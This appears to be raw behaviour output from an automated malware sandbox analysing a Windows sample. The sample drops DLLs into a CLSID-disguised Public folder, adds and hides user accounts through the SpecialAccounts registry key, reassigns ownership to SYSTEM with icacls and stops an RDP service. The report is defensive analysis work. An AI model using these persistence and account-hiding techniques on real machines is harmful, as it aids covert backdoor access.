Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samlib.dll

Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe

File written: C:\Users\user\AppData\Local\Temp\wfpblk.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 5654528 > 1048576

Source: file.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x43c600

Source:	Binary string: RfxVmt.pdb source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, Cw0MZxef.23.dr, rfxvmt.dll.23.dr
Source:	Binary string: RfxVmt.pdbGCTL source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, Cw0MZxef.23.dr, rfxvmt.dll.23.dr

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.2770000.1.unpack

Source: rfxvmt.dll.23.dr

Static PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]

Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe

Code function: 5_2_00007FF64B93FF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

5_2_00007FF64B93FF1F

Source: file.exe	Static PE information: section name: .didata
Source: cwjk513wjc7a1mlgh3.exe.1.dr	Static PE information: section name: .xdata
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe.1.dr	Static PE information: section name: .xdata
Source: main.exe.12.dr	Static PE information: section name: .xdata
Source: termsrv32.dll.23.dr	Static PE information: section name: .xdata
Source: rdpctl.dll.23.dr	Static PE information: section name: .xdata
Source: samctl.dll.23.dr	Static PE information: section name: .xdata
Source: prgmgr.dll.23.dr	Static PE information: section name: .xdata
Source: dwlmgr.dll.23.dr	Static PE information: section name: .xdata
Source: cnccli.dll.23.dr	Static PE information: section name: .xdata
Source: libi2p.dll.23.dr	Static PE information: section name: .xdata
Source: evtsrv.dll.23.dr	Static PE information: section name: .xdata
Source: ROF9A37w.23.dr	Static PE information: section name: .xdata
Source: w3LkirgH.23.dr	Static PE information: section name: .xdata
Source: eKTTDy2k.23.dr	Static PE information: section name: .xdata
Source: bMZx4vGr.23.dr	Static PE information: section name: .xdata
Source: ogg99SMu.23.dr	Static PE information: section name: .xdata
Source: t291wOio.23.dr	Static PE information: section name: .xdata
Source: 6rRRlGVV.23.dr	Static PE information: section name: .xdata
Source: TsG1eHIt.23.dr	Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0274F262 push es; retf	0_2_0274F263
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0273120E pushfd ; retf	0_2_0273120F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02736769 push esi; ret	0_2_0273676B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE7A07 push qword ptr [00007FFE47BE78D8h]; retf	23_2_00007FFE11BE7A0D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE79FF push qword ptr [00007FFE47BE78D0h]; retf	23_2_00007FFE11BE7A05
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE7A17 push qword ptr [00007FFE18BE78E8h]; retf	23_2_00007FFE11BE7A1D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE7A0F push qword ptr [00007FFE47BE78E0h]; retf	23_2_00007FFE11BE7A15
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE79CB push qword ptr [00007FFE47BE789Ch]; retf	23_2_00007FFE11BE79D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE79C3 push qword ptr [00007FFE47BE7894h]; retf	23_2_00007FFE11BE79C9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE79D3 push qword ptr [00007FFE47BE78A4h]; retf	23_2_00007FFE11BE79D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE79E7 push qword ptr [00007FFE47BE78B8h]; retf	23_2_00007FFE11BE79ED
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE79F7 push qword ptr [00007FFE47BE78C8h]; retf	23_2_00007FFE11BE79FD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE79EF push qword ptr [00007FFE47BE78C0h]; retf	23_2_00007FFE11BE79F5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE79BB push qword ptr [00007FFE47BE788Ch]; retf	23_2_00007FFE11BE79C1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE79B3 push qword ptr [00007FFE47BE7884h]; retf	23_2_00007FFE11BE79B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE72CC push rsp; ret	23_2_00007FFE11BE72CD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE72C4 push rsp; ret	23_2_00007FFE11BE72C5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE72DC push rsp; ret	23_2_00007FFE11BE72DD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE72D8 push rsp; ret	23_2_00007FFE11BE72D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE72D4 push rsp; ret	23_2_00007FFE11BE72D5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE72D0 push rsp; ret	23_2_00007FFE11BE72D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE72E8 push rsp; ret	23_2_00007FFE11BE72E9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE72E4 push rsp; ret	23_2_00007FFE11BE72E5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE72E0 push rsp; ret	23_2_00007FFE11BE72E1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE72BC push rsp; ret	23_2_00007FFE11BE72BD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE72B8 push rsp; ret	23_2_00007FFE11BE72B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE727C push rsp; ret	23_2_00007FFE11BE727D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE726F push qword ptr [rsi]; ret	23_2_00007FFE11BE7275
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11ED0052 push rsi; iretd	23_2_00007FFE11ED0053

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FFE1150870B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,

23_2_00007FFE1150870B

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\ROF9A37w	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\TsG1eHIt	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\bMZx4vGr	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\ogg99SMu	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\t291wOio	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\Cw0MZxef	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\eKTTDy2k	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\w3LkirgH	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\6rRRlGVV	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll	Jump to dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\ROF9A37w	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\TsG1eHIt	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\bMZx4vGr	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\ogg99SMu	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\t291wOio	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\Cw0MZxef	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\eKTTDy2k	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\w3LkirgH	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\6rRRlGVV	Jump to dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\ROF9A37w	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\Cw0MZxef	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\w3LkirgH	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\eKTTDy2k	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\bMZx4vGr	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\ogg99SMu	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\t291wOio	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\6rRRlGVV	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\TsG1eHIt	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe

File created: C:\Users\user\AppData\Local\Temp\installer.log

Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FF7C1AB1DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

23_2_00007FF7C1AB1DBC

Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe

Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000020.00000002.2955747278.00007FFE11784000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000020.00000002.2955747278.00007FFE11784000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe

Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18

Source: C:\Users\user\Desktop\file.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
